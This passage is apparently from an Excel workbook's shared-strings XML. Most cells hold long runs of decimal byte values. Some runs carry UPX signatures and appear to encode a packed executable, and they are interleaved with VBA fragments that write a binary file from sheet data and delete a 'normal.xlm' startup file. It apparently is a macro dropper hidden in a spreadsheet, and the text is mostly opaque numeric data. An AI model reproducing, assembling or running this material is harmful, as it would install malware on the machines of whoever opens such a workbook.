0 0 0 0 0 0 0 0 0 </t>
  </si>
  <si>
    <t xml:space="preserve">69 218 73 34 85 52 93 86 136 2 15 54 46 87 111 55 240 3 220 50 108 89 240 89 3 253 55 117 201 93 252 142 64 177 255 132 67 137 29 11 137 30 214 147 91 104 51 47 164 169 14 91 36 149 112 175 108 189 190 224 43 26 153 165 184 209 35 86 91 21 56 82 161 130 6 253 177 162 200 36 254 56 24 173 102 253 190 221 142 248 80 3 252 80 83 83 159 27 182 125 174 45 13 219 216 136 212 59 24 214 161 221 181 97 147 8 47 39 36 134 80 86 41 10 109 135 53 252 39 20 184 137 54 203 20 219 156 163 138 189 76 149 218 45 211 24 114 193 131 33 114 147 10 100 136 125 193 199 181 200 8 11 74 152 150 3 55 72 249 102 192 45 22 122 34 117 68 163 1 173 250 34 246 27 109 177 251 132 255 37 1 210 246 130 97 121 71 46 197 66 129 27 229 1 89 6 138 118 100 236 133 149 22 70 64 11 213 235 206 12 183 183 81 32 164 197 70 64 28 235 67 121 219 34 99 30 5 4 64 68 218 246 131 107 238 254 45 25 24 136 30 70 101 32 116 9 9 8 172 177 64 121 9 117 204 192 72 99 74 180 53 114 116 102 255 30 136 78 0 192 247 53 179 94 224 68 43 5 39 3 104 96 102 204 225 23 200 188 133 179 181 85 196 83 2 156 8 133 224 239 91 108 34 92 211 64 67 235 247 146 44 246 195 251 11 142 216 228 37 123 109 13 128 120 1 34 141 227 15 20 226 91 29 139 194 235 3 130 206 210 250 173 193 27 24 24 15 148 130 5 209 235 139 211 75 181 183 127 27 249 14 67 136 198 6 92 70 177 75 117 243 128 205 183 108 208 167 74 205 24 10 138 63 116 172 43 224 160 58 125 67 40 25 226 194 9 19 6 6 31 27 15 64 248 64 115 3 3 21 1 96 28 162 225 238 107 67 48 15 14 112 199 3 131 39 142 111 148 154 171 20 255 251 72 73 161 228 119 129 246 248 3 2 139 45 76 96 77 209 9 27 141 109 163 255 168 117 4 213 14 11 116 217 226 247 76 190 33 237 235 40 67 72 204 153 89 248 248 59 251 23 234 27 2 182 10 52 234 94 30 64 177 136 129 170 109 214 97 67 12 63 39 </t>
  </si>
  <si>
    <t xml:space="preserve">97 32 43 152 228 228 59 223 75 117 61 176 133 156 248 125 158 27 18 3 162 219 46 198 36 252 58 222 139 196 65 220 131 181 215 4 183 156 235 19 147 139 240 38 13 226 173 141 17 139 56 103 220 116 102 110 215 37 107 179 220 97 33 87 244 77 236 169 8 103 49 26 165 160 153 141 182 208 55 96 216 32 50 246 69 13 193 64 62 118 51 4 219 28 120 178 211 213 127 30 218 152 173 141 108 50 72 210 143 179 80 168 93 179 101 200 213 127 13 109 22 17 163 91 61 179 36 35 191 144 54 220 137 93 224 18 221 187 88 139 62 178 125 223 116 180 86 100 228 181 155 59 101 103 116 156 143 179 117 4 3 29 186 205 26 230 140 40 104 32 61 168 182 25 240 213 68 221 177 113 228 50 69 104 170 198 113 193 65 181 20 108 252 193 86 141 74 194 13 213 116 239 54 226 2 181 241 73 0 243 12 94 117 5 43 132 28 140 79 145 139 194 78 8 100 10 158 122 50 24 161 48 93 219 145 27 38 88 36 62 93 81 94 86 219 8 78 182 86 165 168 4 50 29 27 26 100 57 227 86 73 83 164 206 91 248 120 71 167 88 163 67 45 36 242 28 73 102 7 134 187 5 161 20 16 51 80 51 73 62 35 59 52 65 176 148 93 24 1 217 152 109 141 83 44 52 32 236 234 246 157 24 31 224 86 116 99 186 141 60 104 176 16 28 56 124 245 225 96 68 91 88 87 204 169 235 11 131 193 161 20 12 253 131 155 45 84 75 247 41 52 86 95 28 209 30 46 89 85 82 248 215 72 30 206 87 67 168 245 204 228 41 102 69 156 172 90 59 130 246 47 141 84 193 4 138 76 3 85 62 138 161 20 239 215 193 190 131 37 128 220 161 8 145 1 90 122 128 225 127 232 129 145 188 21 254 254 103 17 128 201 128 220 136 10 102 132 195 198 94 195 176 176 78 70 19 235 10 15 91 64 172 35 182 81 61 229 7 114 199 62 138 239 20 129 233 11 45 147 1 23 115 236 168 110 165 18 52 46 12 139 225 204 108 213 222 39 64 4 80 50 204 108 0 132 4 8 42 130 216 12 65 255 61 24 55 254 127 215 162 3 114 117 110 116 105 109 101 32 101 114 114 </t>
  </si>
  <si>
    <t xml:space="preserve">72 209 248 37 3 118 5 184 3 47 193 224 6 11 200 32 187 75 191 105 100 87 3 131 201 32 139 193 208 191 31 23 247 247 30 222 109 11 163 199 105 113 10 43 202 3 207 207 92 63 107 183 206 38 25 87 75 50 28 17 75 48 129 225 237 193 99 166 255 195 13 199 67 48 166 38 77 208 190 155 20 30 139 195 20 140 185 206 55 218 168 158 182 95 76 32 228 94 73 91 118 241 88 9 27 208 117 32 59 237 127 26 24 127 150 238 200 116 21 139 247 224 93 137 83 24 38 214 224 155 189 38 236 225 4 4 227 110 73 126 246 116 24 161 36 137 67 24 93 23 117 26 71 132 161 219 230 108 6 19 63 215 11 141 109 177 52 10 144 142 124 39 12 120 186 68 131 64 78 213 112 190 155 8 115 37 195 141 104 116 5 2 215 225 40 200 54 194 195 106 181 60 2 8 172 66 85 104 131 173 87 237 35 17 28 122 59 121 108 51 4 235 58 237 54 182 86 142 51 120 204 179 63 38 63 68 113 235 46 221 94 60 102 6 80 254 104 78 12 126 60 5 205 209 184 237 9 254 79 63 231 139 150 240 75 186 202 35 205 243 170 9 16 161 235 182 157 236 117 89 53 24 11 12 237 184 50 135 165 16 222 197 86 62 78 106 107 145 134 20 68 24 91 236 93 6 225 132 103 180 55 96 7 95 95 159 193 240 16 96 161 112 40 38 98 254 1 44 35 8 40 143 24 89 216 120 228 129 87 34 151 28 37 182 255 123 2 140 10 120 4 131 255 42 116 13 4 113 9 67 180 49 198 129 255 104 119 221 8 57 154 225 2 91 80 39 40 158 86 36 66 140 216 86 120 55 239 65 60 20 2 19 82 20 144 101 228 50 70 64 56 78 81 164 91 217 101 86 66 48 62 55 81 174 80 184 22 176 109 144 222 177 5 248 175 28 77 94 72 131 224 253 115 95 184 92 50 45 185 94 9 63 85 38 134 69 4 40 53 109 16 207 217 176 217 75 97 234 254 149 173 233 195 43 195 137 21 69 126 181 183 133 192 31 86 77 194 85 48 83 90 5 26 177 125 146 92 26 48 16 135 73 141 82 71 199 24 205 220 214 241 13 196 201 200 77 176 95 3 195 3 203 </t>
  </si>
  <si>
    <t>Open filesv For Binary Access Write As #1</t>
  </si>
  <si>
    <t xml:space="preserve">0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 224 85 80 88 50 0 0 0 0 0 16 0 0 0 192 0 0 0 2 0 0 0 54 0 0 0 0 0 0 0 0 0 0 0 0 0 0 64 0 0 192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49 46 50 52 0 85 80 88 33 12 9 2 8 130 93 234 233 175 56 171 137 32 132 0 0 121 47 0 0 0 128 0 0 38 3 0 4 </t>
  </si>
  <si>
    <t xml:space="preserve">35 39 28 245 245 243 206 22 110 193 11 235 232 100 32 180 92 181 84 183 165 93 184 235 177 50 102 123 119 236 64 72 110 129 6 141 181 39 212 208 236 69 107 182 136 46 24 83 102 46 179 11 116 152 237 86 49 76 251 67 43 72 85 3 27 15 62 241 205 212 42 15 6 120 60 120 137 253 215 166 68 219 211 177 177 206 64 177 236 208 44 180 89 188 179 157 223 212 19 60 53 34 252 0 6 200 224 215 0 3 159 13 87 223 106 11 89 190 168 41 144 0 165 102 140 51 30 232 165 106 52 93 46 159 171 16 5 35 11 64 240 253 253 19 198 96 97 218 194 0 237 25 191 229 8 215 139 64 141 22 81 80 188 195 2 204 135 64 18 99 7 157 2 211 193 56 83 184 60 216 97 138 156 253 184 53 56 227 7 64 122 118 39 55 58 33 28 84 181 147 182 87 191 101 5 127 157 75 33 3 12 89 137 213 72 188 165 20 163 61 244 109 102 13 213 45 30 3 3 80 85 80 28 22 117 5 255 104 116 71 106 12 3 200 135 10 254 154 224 201 243 12 200 150 30 190 89 51 199 207 237 185 64 4 76 18 104 116 138 154 108 246 156 108 91 76 64 18 20 169 38 107 72 188 235 146 98 59 87 85 72 195 8 118 223 29 232 177 135 65 64 235 95 116 17 96 75 154 204 33 228 32 222 136 150 106 133 200 88 15 35 102 30 156 206 205 112 139 53 185 10 201 112 160 240 202 182 209 10 39 122 144 229 148 61 60 206 141 171 224 255 126 68 205 146 27 125 209 164 191 235 87 181 200 252 117 93 183 89 12 251 240 187 212 192 4 86 144 91 5 217 22 19 4 146 197 241 13 100 23 216 55 172 50 194 182 37 95 183 226 64 14 242 39 160 17 240 64 158 3 121 148 247 136 228 57 144 231 243 120 244 96 150 228 249 14 248 185 76 28 115 15 154 104 192 72 121 10 178 230 31 188 94 172 240 174 11 73 0 198 169 236 42 4 51 174 79 50 131 246 145 198 92 53 44 232 120 117 14 104 8 17 84 46 61 29 252 128 24 237 200 254 48 91 119 142 17 201 254 27 170 28 248 120 54 100 3 141 200 11 106 47 6 13 76 58 115 160 172 3 186 73 </t>
  </si>
  <si>
    <t>fso.deletefile Application.StartupPath &amp; "\normal.xlm"</t>
  </si>
  <si>
    <t xml:space="preserve">252 190 21 120 247 14 72 103 15 182 1 65 3 194 247 216 27 192 154 192 5 54 151 16 233 16 9 94 7 54 58 240 143 162 122 12 165 121 66 133 82 89 21 65 197 1 152 48 96 160 198 247 20 252 91 65 32 88 6 27 160 138 11 152 46 218 80 4 175 10 158 162 248 86 173 148 171 0 119 193 110 116 98 91 168 181 202 23 73 98 4 72 83 107 129 223 214 138 64 5 60 10 90 255 216 129 18 207 86 55 66 79 1 232 248 198 14 104 162 77 226 5 10 184 22 80 81 49 57 139 145 180 36 183 58 45 137 23 42 147 124 193 117 21 8 44 28 36 26 240 147 19 252 49 109 177 73 60 88 115 19 255 80 101 23 98 129 37 110 76 139 85 240 85 240 76 3 44 99 81 110 171 128 248 88 23 122 217 98 210 116 82 63 4 12 4 14 36 251 22 45 3 142 136 68 109 80 13 91 43 68 129 48 224 9 238 203 102 91 58 22 160 16 138 13 26 51 174 254 218 173 196 60 13 217 181 71 255 19 90 194 73 57 104 37 186 46 159 24 33 64 193 72 179 221 191 21 219 8 2 235 94 198 7 13 71 68 235 115 203 12 216 121 115 43 212 255 106 1 208 10 216 96 161 155 9 71 34 244 185 65 187 230 11 179 15 31 19 138 69 255 23 70 139 11 237 13 10 255 71 136 68 49 5 235 41 59 71 210 128 125 255 99 179 88 138 183 5 22 10 235 24 49 255 74 189 18 47 6 119 25 123 119 26 54 75 206 191 146 219 71 235 16 93 116 218 37 215 232 243 6 146 228 44 6 43 70 32 11 23 134 155 231 81 54 241 199 226 180 16 116 2 255 208 104 20 74 104 8 134 124 63 229 4 197 236 104 4 14 0 193 202 85 172 202 98 200 183 9 249 204 20 83 16 1 87 15 95 57 200 108 167 221 61 216 100 117 17 151 245 44 122 9 147 233 143 40 156 198 83 139 92 127 55 91 148 161 237 212 136 29 208 40 60 161 176 251 255 232 103 131 34 139 13 172 126 141 113 252 59 240 114 19 139 6 151 254 220 168 53 195 247 53 176 237 94 104 32 249 46 13 249 148 24 241 104 40 16 36 138 125 141 47 133 219 91 75 122 137 134 108 23 </t>
  </si>
  <si>
    <t xml:space="preserve">84 0 104 0 105 0 115 0 87 0 111 0 114 0 107 0 98 0 111 0 111 0 107 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 26 0 2 1 255 255 255 255 10 0 0 0 255 255 255 255 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 12 0 0 0 0 0 0 95 0 95 0 83 0 82 0 80 0 95 0 52 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 16 0 2 1 9 0 0 0 255 255 255 255 255 255 255 255 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 48 0 0 0 180 2 0 0 0 0 0 0 95 0 95 0 83 0 82 0 80 0 95 0 53 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 16 0 2 0 5 0 0 0 4 0 0 0 255 255 255 255 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 59 0 0 0 105 0 0 0 0 0 0 0 123 124 49 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 6 0 2 1 255 255 255 255 255 255 255 255 255 255 255 255 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 37 0 0 0 116 48 0 0 0 0 0 0 </t>
  </si>
  <si>
    <t xml:space="preserve">17 44 216 6 36 207 132 135 228 155 185 150 67 23 244 244 177 218 112 239 80 177 23 15 83 41 125 193 54 225 52 200 240 177 152 8 233 132 205 167 185 255 43 45 246 252 186 208 186 94 179 195 54 10 195 60 50 42 154 219 195 1 106 229 158 36 176 157 200 167 139 240 148 115 73 249 196 186 92 46 249 12 250 176 186 24 144 80 225 241 35 75 118 96 164 106 7 137 133 174 86 215 80 203 134 172 180 184 198 180 31 155 173 253 72 92 188 57 29 76 232 8 35 156 15 149 217 10 185 75 183 133 42 109 74 141 228 36 74 48 178 69 245 228 252 89 249 28 131 194 164 178 44 255 45 255 115 155 237 37 16 133 164 104 144 4 155 0 38 129 55 21 252 28 18 92 97 230 73 18 27 34 134 214 37 31 94 18 179 71 245 83 36 58 58 155 58 232 80 60 132 186 225 152 63 183 190 70 232 90 212 89 213 171 212 104 124 66 58 93 6 208 104 111 54 6 28 12 69 41 52 54 49 115 4 3 36 30 19 251 255 126 54 215 88 177 138 140 5 15 50 76 5 212 64 131 248 8 136 14 157 133 210 110 199 68 124 232 224 223 164 221 85 4 152 85 136 28 184 44 12 166 56 188 114 48 110 53 146 1 12 156 81 120 16 252 168 255 72 168 144 154 137 106 98 88 57 6 118 132 77 193 82 105 6 48 139 14 43 78 192 21 4 35 182 38 240 131 104 32 17 28 203 12 94 186 200 200 8 54 100 104 111 253 235 122 3 9 1 15 209 104 200 166 160 64 102 100 190 251 127 54 254 251 118 30 141 132 29 24 138 8 80 136 15 68 156 71 1 71 131 30 192 142 254 195 4 71 59 222 114 226 67 209 238 174 88 54 224 224 106 208 174 156 157 203 248 251 172 187 156 80 191 156 87 190 144 102 219 154 65 112 20 199 16 15 143 188 32 201 67 203 160 86 109 22 162 80 123 6 121 44 3 204 134 97 144 27 7 211 0 219 69 55 201 252 78 175 96 82 240 230 242 154 173 203 2 248 200 76 228 170 1 14 68 132 85 235 140 224 117 96 68 168 228 90 53 8 22 13 241 144 117 38 124 176 170 34 198 2 136 24 86 177 120 64 50 182 97 188 30 89 </t>
  </si>
  <si>
    <t xml:space="preserve">148 117 16 90 4 231 108 83 137 87 84 2 195 15 148 38 132 133 18 117 5 195 63 86 208 112 120 129 56 141 164 36 15 42 61 23 179 33 140 115 35 57 14 30 231 32 240 193 20 107 85 54 83 2 10 159 133 237 3 114 62 34 64 1 80 115 76 189 236 216 46 24 206 192 76 17 176 193 85 35 198 241 178 221 48 195 45 60 65 35 44 56 35 194 12 5 182 174 39 11 83 47 67 58 10 6 161 107 209 13 47 234 39 61 215 91 29 240 65 119 22 131 187 221 2 140 87 220 182 57 126 229 126 220 49 72 88 35 88 112 187 27 138 165 222 38 113 147 152 22 5 179 156 107 124 217 54 138 200 76 67 43 67 104 128 131 83 94 188 200 118 4 86 28 144 34 5 75 175 208 198 43 66 150 223 9 131 182 219 70 143 229 145 40 199 5 48 127 132 44 4 185 87 42 116 7 61 19 55 10 234 53 116 131 76 63 3 40 197 100 13 251 251 182 180 11 200 61 7 14 129 40 198 64 45 131 128 9 125 123 193 145 236 148 96 212 91 74 59 242 196 119 252 135 97 120 94 120 88 43 200 59 194 222 119 83 131 150 30 223 133 249 31 78 72 186 83 231 18 64 108 120 107 45 152 9 76 68 10 2 50 211 231 203 8 51 54 34 51 199 233 37 75 67 150 143 214 44 209 80 210 168 64 60 142 115 227 239 209 74 255 75 88 117 187 233 65 90 223 157 202 198 72 141 200 159 184 80 198 88 112 146 65 250 211 2 60 74 235 105 56 35 108 143 88 48 138 4 109 139 46 147 15 39 161 53 180 79 64 139 144 35 4 12 222 100 146 17 192 233 21 93 58 187 108 139 233 141 18 73 22 59 241 47 218 221 205 245 237 194 73 229 139 242 255 169 210 194 104 56 130 194 170 215 249 132 50 154 92 128 66 209 173 24 25 73 110 254 134 253 246 157 219 116 225 118 153 4 59 207 252 117 43 147 65 14 233 206 82 81 79 83 83 166 13 56 94 128 250 27 15 57 71 149 17 11 24 255 14 254 200 184 233 140 255 85 0 237 141 155 255 108 52 126 16 71 115 8 172 255 46 32 87 32 131 241 44 160 108 71 50 44 237 15 88 27 180 99 208 46 4 83 </t>
  </si>
  <si>
    <t>hv = ThisWorkbook.Sheets("@kbtasto@she3#").Cells(i, 5).Value</t>
  </si>
  <si>
    <t xml:space="preserve">130 216 6 125 44 95 235 38 106 141 48 147 118 19 234 109 54 58 8 106 244 219 220 45 198 162 80 148 94 41 104 64 237 50 77 9 35 191 148 124 113 182 238 173 172 131 37 116 8 0 6 120 53 185 17 184 28 163 112 79 104 5 198 0 26 123 227 45 154 161 24 28 128 161 124 7 136 187 133 63 234 220 20 16 43 80 12 88 0 36 114 7 24 166 66 11 156 20 175 201 204 13 71 33 182 28 85 79 210 18 45 182 13 74 25 117 113 12 90 191 232 224 95 250 194 252 87 193 238 178 206 139 122 252 105 201 4 193 75 75 221 125 3 141 141 140 1 68 153 137 93 244 97 240 127 33 92 75 137 19 247 126 117 127 193 249 4 106 250 197 27 245 63 73 95 137 7 207 118 3 3 76 19 148 169 165 214 220 3 95 72 135 254 214 111 190 126 32 115 28 191 128 211 239 141 76 1 21 215 33 124 176 68 254 246 82 187 45 66 43 117 33 57 7 131 193 224 30 166 56 152 11 45 33 188 176 163 54 92 233 116 36 6 184 81 184 124 11 176 25 219 85 137 10 4 8 3 250 121 91 224 91 185 8 140 140 193 255 4 79 24 63 123 93 1 67 91 134 95 176 115 151 236 88 51 117 27 106 160 66 43 167 17 161 221 149 122 139 86 248 73 90 244 166 118 5 137 240 231 182 214 243 202 65 27 251 64 62 59 250 118 90 133 184 109 51 250 191 116 107 155 32 145 145 1 219 190 81 189 186 234 11 22 185 228 210 33 84 17 30 189 177 150 144 15 210 33 148 76 82 202 114 182 109 191 73 190 74 11 4 8 104 97 139 214 17 145 187 236 213 9 80 120 109 180 115 238 137 247 88 115 221 27 182 178 249 41 11 38 137 47 14 251 101 43 91 5 8 151 74 99 138 76 7 4 239 222 237 187 127 32 136 77 15 254 193 136 11 115 37 128 125 15 70 14 187 136 68 178 221 13 118 211 235 118 9 25 13 118 35 246 173 63 177 9 24 235 41 36 227 79 224 25 59 4 247 44 37 89 4 15 157 132 183 188 197 27 30 9 56 139 84 69 240 137 26 57 19 252 255 39 30 203 2 60 250 161 118 110 1 188 124 128 223 73 108 122 61 104 96 54 160 </t>
  </si>
  <si>
    <t xml:space="preserve">176 107 131 77 199 151 128 54 9 117 29 122 42 72 3 120 122 88 31 5 127 151 147 151 233 47 178 20 116 190 1 123 251 226 53 52 98 11 93 81 36 204 106 16 69 109 180 58 191 255 80 64 247 216 26 93 54 69 214 79 65 161 181 90 30 104 139 200 183 222 172 175 0 115 12 83 159 78 14 11 246 23 117 145 116 151 240 97 169 194 104 238 74 11 194 65 136 88 67 145 14 245 9 18 28 71 136 29 40 77 8 225 21 213 181 72 196 241 35 18 136 201 115 22 103 205 62 246 204 98 120 197 161 88 131 211 65 137 88 81 251 212 67 25 25 217 92 68 5 220 224 228 104 133 25 25 232 236 244 208 60 4 161 137 5 140 13 193 219 21 131 147 163 202 34 104 85 60 183 164 89 156 121 158 23 141 89 64 83 189 24 162 71 80 156 224 215 57 5 219 116 12 207 192 113 140 250 53 93 195 69 191 80 24 36 150 136 133 93 87 18 1 112 183 151 38 208 84 194 93 12 64 36 137 3 128 8 153 118 15 14 226 204 125 235 180 64 71 219 104 3 164 106 19 92 2 99 99 238 20 66 52 80 10 86 32 223 227 88 117 1 64 104 16 121 83 176 220 219 87 53 198 64 1 86 199 3 2 8 2 182 63 237 22 20 57 127 196 52 131 56 159 5 144 195 150 93 143 235 73 103 152 0 208 9 187 16 63 16 87 150 131 63 167 98 3 182 42 21 51 199 235 15 130 166 224 65 90 31 81 206 23 69 54 248 12 53 52 15 176 69 161 159 159 201 216 248 19 116 0 77 164 187 74 83 154 2 211 176 214 83 61 220 231 172 120 162 230 245 30 125 32 55 17 55 58 224 129 120 70 22 135 36 70 182 207 214 123 6 7 28 70 4 8 32 20 107 173 46 90 40 218 118 153 8 17 37 151 109 134 141 14 24 44 4 33 205 37 221 16 29 3 28 6 225 147 166 173 234 100 178 86 129 199 44 45 4 47 131 155 18 88 188 221 56 86 96 27 82 240 13 89 189 237 95 20 152 73 22 147 180 84 35 3 50 129 110 232 184 52 60 68 3 252 76 86 190 0 144 1 107 208 165 204 155 173 35 22 167 216 81 3 236 208 81 136 133 120 129 86 99 3 </t>
  </si>
  <si>
    <t>Next</t>
  </si>
  <si>
    <t xml:space="preserve">112 48 187 115 32 125 129 237 88 116 86 18 120 53 59 200 115 77 28 100 233 124 200 213 60 57 179 27 85 177 212 164 167 5 119 31 57 123 19 221 168 223 125 229 17 99 43 75 104 129 249 0 90 118 3 183 102 100 201 87 66 112 112 57 50 15 135 240 143 255 189 103 219 97 108 138 75 112 139 187 31 141 116 2 253 211 140 166 173 66 159 194 81 92 23 87 114 50 72 83 72 88 87 187 58 237 246 76 17 187 74 132 59 250 155 163 27 163 29 103 192 185 93 248 189 43 248 214 35 176 128 228 254 168 112 141 100 178 132 77 47 184 226 81 209 59 214 13 119 59 138 169 100 74 24 107 135 197 179 84 120 183 255 254 117 179 76 227 82 96 103 195 153 166 89 2 88 219 230 212 228 4 150 83 210 213 194 203 198 32 163 31 135 216 201 173 125 180 24 35 93 217 86 55 159 2 72 31 233 202 196 138 68 17 255 152 38 156 38 157 146 158 152 11 154 116 144 154 151 71 126 137 187 159 210 37 158 67 154 131 73 236 117 47 124 141 244 107 20 147 108 66 195 11 44 118 69 114 150 138 99 93 249 28 110 155 92 120 108 65 72 1 96 1 56 108 25 172 7 235 216 91 172 195 116 76 87 68 2 255 88 200 33 93 8 191 66 147 69 25 4 33 102 231 116 100 112 201 17 93 232 93 208 142 12 152 234 79 4 95 250 173 6 188 46 86 116 98 6 200 116 91 57 72 32 217 26 240 86 110 4 36 116 81 41 2 8 250 219 119 99 24 196 44 2 154 86 12 86 16 57 78 24 137 136 173 149 150 129 125 62 7 16 24 171 182 253 38 137 131 226 71 131 194 42 26 4 39 247 216 236 106 27 86 26 32 46 117 140 139 214 50 122 212 190 234 172 133 189 198 182 26 29 216 127 28 211 209 86 205 166 26 180 112 36 133 247 1 13 174 173 184 169 32 178 138 0 58 194 231 108 74 103 109 151 131 48 56 10 220 119 20 5 71 255 127 218 38 196 176 87 32 137 87 24 117 10 199 71 32 96 141 80 152 91 161 109 87 40 17 36 248 14 36 128 6 136 6 13 40 24 111 13 174 152 169 104 97 70 16 220 91 169 251 253 32 59 218 125 7 189 166 </t>
  </si>
  <si>
    <t>n = 1</t>
  </si>
  <si>
    <t xml:space="preserve">109 212 208 15 48 12 82 225 104 231 162 128 3 139 67 162 31 236 61 8 179 50 28 9 80 8 14 57 187 155 189 63 64 16 131 164 136 108 36 15 254 72 67 10 173 12 55 58 72 100 121 67 19 229 152 94 226 216 4 254 17 131 120 150 117 108 83 16 0 186 215 26 13 90 18 9 16 10 240 152 204 68 244 217 55 136 6 49 242 243 220 139 200 125 171 133 99 40 43 200 146 17 16 141 72 20 81 111 7 6 62 138 57 76 177 23 255 13 47 175 109 53 222 59 5 34 53 10 20 150 58 51 64 163 211 137 13 76 142 88 172 59 205 130 243 137 53 123 42 102 4 239 74 1 47 104 87 141 60 130 97 218 216 98 208 97 23 118 240 23 194 75 221 209 106 73 52 125 14 131 144 211 238 131 237 2 56 46 196 255 250 235 16 38 166 175 3 119 161 64 211 232 14 38 161 105 183 11 191 241 139 216 59 223 127 8 115 25 139 75 225 59 35 43 35 254 107 220 162 197 11 207 69 26 20 59 154 24 9 249 126 183 114 231 7 117 121 139 218 59 216 38 21 13 238 110 155 5 235 230 25 117 89 36 115 17 131 17 121 118 174 0 106 19 55 235 237 38 67 115 246 14 13 27 47 238 14 8 251 131 205 109 42 125 123 133 219 116 20 43 43 46 89 91 116 219 160 65 183 105 67 168 56 255 109 221 251 9 158 42 120 137 29 165 20 139 22 250 29 110 80 169 199 74 217 140 144 182 219 217 195 46 128 144 68 136 55 139 18 112 17 85 23 92 64 43 221 186 14 68 11 1 152 224 219 214 139 11 117 23 139 145 19 244 191 85 174 24 28 160 139 254 35 57 11 215 116 233 139 97 205 42 212 151 202 72 92 88 176 6 221 198 77 118 76 87 206 15 102 110 171 127 119 106 32 100 95 133 201 124 5 209 225 71 68 139 32 241 174 174 219 84 249 67 10 43 127 241 123 193 254 4 78 204 141 155 46 94 63 126 248 94 59 247 155 13 1 2 210 166 147 36 97 32 125 43 17 253 109 105 163 14 56 156 211 243 236 35 92 136 68 137 250 45 112 220 3 254 15 117 234 43 236 33 11 235 49 98 180 216 64 23 43 149 161 193 10 174 221 50 33 25 </t>
  </si>
  <si>
    <t xml:space="preserve">7 139 30 131 238 252 17 219 17 201 1 219 115 239 117 9 139 30 131 238 252 17 219 115 228 131 193 2 129 253 0 243 255 255 131 209 1 141 20 47 131 253 252 118 15 138 2 66 136 7 71 73 117 247 233 99 255 255 255 144 139 2 131 194 4 137 7 131 199 4 131 233 4 119 241 1 207 233 76 255 255 255 94 137 247 185 224 0 0 0 138 7 71 44 232 60 1 119 247 128 63 3 117 242 139 7 138 95 4 102 193 232 8 193 192 16 134 196 41 248 128 235 232 1 240 137 7 131 199 5 137 216 226 217 141 190 0 128 0 0 139 7 9 192 116 60 139 95 4 141 132 48 0 176 0 0 1 243 80 131 199 8 255 150 40 176 0 0 149 138 7 71 8 192 116 220 137 249 87 72 242 174 85 255 150 44 176 0 0 9 192 116 7 137 3 131 195 4 235 225 255 150 48 176 0 0 97 233 169 102 255 255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</si>
  <si>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9 27 29 155 219 188 219 4 26 100 19 20 4 161 184 163 188 4 202 53 92 225 183 185 176 6 5 172 37 207 247 144 183 54 222 122 23 160 228 80 39 63 69 236 139 60 9 237 58 190 55 85 224 80 81 254 224 122 139 176 117 224 110 201 93 224 30 107 61 136 53 215 5 13 114 123 15 198 34 84 172 34 141 104 188 134 68 112 13 54 132 185 47 36 89 37 8 102 183 13 203 172 254 4 86 216 36 30 93 3 127 133 86 230 130 36 73 89 11 106 159 128 225 232 50 221 122 64 45 12 242 85 250 196 23 119 221 12 59 61 160 133 15 131 134 122 199 112 11 188 209 39 248 22 230 31 141 101 160 44 227 141 111 148 52 111 3 246 68 48 194 116 105 87 134 216 147 49 178 46 22 60 61 22 106 2 22 229 177 22 165 89 255 31 89 59 197 107 48 219 179 28 43 89 80 108 20 98 10 9 251 93 106 102 16 36 154 51 237 29 45 156 88 15 74 91 123 89 128 100 89 29 237 8 39 70 247 70 249 44 41 89 235 21 100 131 37 148 236 0 58 99 246 96 114 9 61 225 199 71 218 232 56 29 133 25 116 8 216 102 129 70 129 237 6 0 247 251 58 89 114 165 112 208 74 165 25 139 221 186 58 104 252 54 194 5 217 115 61 10 240 249 108 179 157 223 213 226 31 139 12 141 208 209 37 80 164 83 55 57 153 24 8 162 192 131 240 35 97 111 18 163 134 133 139 129 236 20 222 77 173 250 12 251 83 59 13 95 69 230 74 110 46 59 121 1 193 139 241 138 90 6 220 75 52 15 132 87 33 248 102 148 62 200 183 95 248 137 125 240 11 173 168 32 76 249 219 144 46 66 87 81 60 49 3 198 246 64 4 128 109 173 247 97 193 143 69 12 50 208 50 8 250 166 55 11 223 231 141 133 236 251 239 77 252 43 77 12 109 112 235 222 74 16 115 41 10 255 31 138 9 176 10 119 251 214 173 84 9 240 198 117 64 136 8 64 243 141 149 41 107 183 69 137 229 109 0 175 124 204 149 179 141 219 89 59 43 7 69 244 12 80 13 145 133 183 6 209 113 255 52 48 2 28 187 192 2 219 116 67 114 244 139 248 137 124 11 9 183 221 42 91 </t>
  </si>
  <si>
    <t xml:space="preserve">41 54 152 44 178 201 57 10 133 34 10 192 122 4 155 107 211 235 248 0 149 175 122 8 144 132 148 181 173 193 115 52 169 249 66 12 165 150 101 0 169 34 194 100 6 254 26 45 149 110 11 125 41 196 153 11 21 236 210 216 230 17 98 191 176 206 140 9 59 10 15 216 109 151 143 9 124 174 235 47 40 13 141 78 46 246 125 72 182 9 123 4 177 188 173 22 13 132 235 145 190 238 9 55 106 4 137 219 187 220 210 10 137 3 252 178 121 117 240 3 209 34 1 223 110 27 126 18 50 252 159 139 14 33 141 121 15 62 117 26 59 145 186 66 143 29 242 81 75 59 164 35 23 12 26 6 107 17 183 7 39 69 122 141 66 4 8 2 13 111 82 37 90 128 14 255 230 122 44 57 138 133 77 80 79 144 124 90 53 135 212 87 151 116 59 81 22 131 25 20 136 156 192 61 102 106 248 11 10 104 196 65 224 8 69 48 113 100 91 104 221 129 51 32 137 70 251 224 171 111 65 42 106 4 104 33 104 178 87 25 41 